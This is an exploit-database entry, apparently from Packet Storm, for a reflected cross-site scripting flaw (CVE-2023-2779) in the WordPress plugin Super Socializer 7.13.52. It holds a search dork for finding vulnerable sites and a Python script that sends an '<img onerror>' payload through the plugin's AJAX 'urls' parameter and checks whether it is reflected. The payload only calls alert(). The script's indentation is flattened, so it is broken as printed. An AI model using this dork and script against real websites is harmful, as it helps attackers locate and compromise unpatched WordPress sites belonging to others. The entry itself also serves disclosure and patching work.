Share
## https://sploitus.com/exploit?id=PACKETSTORM:173053
# Exploit Title: Super Socializer 7.13.52 - Reflected XSS  
# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com  
# Date: 2023-06-20  
# Exploit Author: Amirhossein Bahramizadeh  
# Category : Webapps  
# Vendor Homepage: https://wordpress.org/plugins/super-socializer  
# Version: 7.13.52 (REQUIRED)  
# Tested on: Windows/Linux  
# CVE : CVE-2023-2779  
import requests  
  
# The URL of the vulnerable AJAX endpoint  
url = "https://example.com/wp-admin/admin-ajax.php"  
  
# The vulnerable parameter that is not properly sanitized and escaped  
vulnerable_param = "<img src=x onerror=alert(document.domain)>"  
  
# The payload that exploits the vulnerability  
payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}  
  
# Send a POST request to the vulnerable endpoint with the payload  
response = requests.post(url, data=payload)  
  
# Check if the payload was executed by searching for the injected script tag  
if "<img src=x onerror=alert(document.domain)>" in response.text:  
print("Vulnerability successfully exploited")  
else:  
print("Vulnerability not exploitable")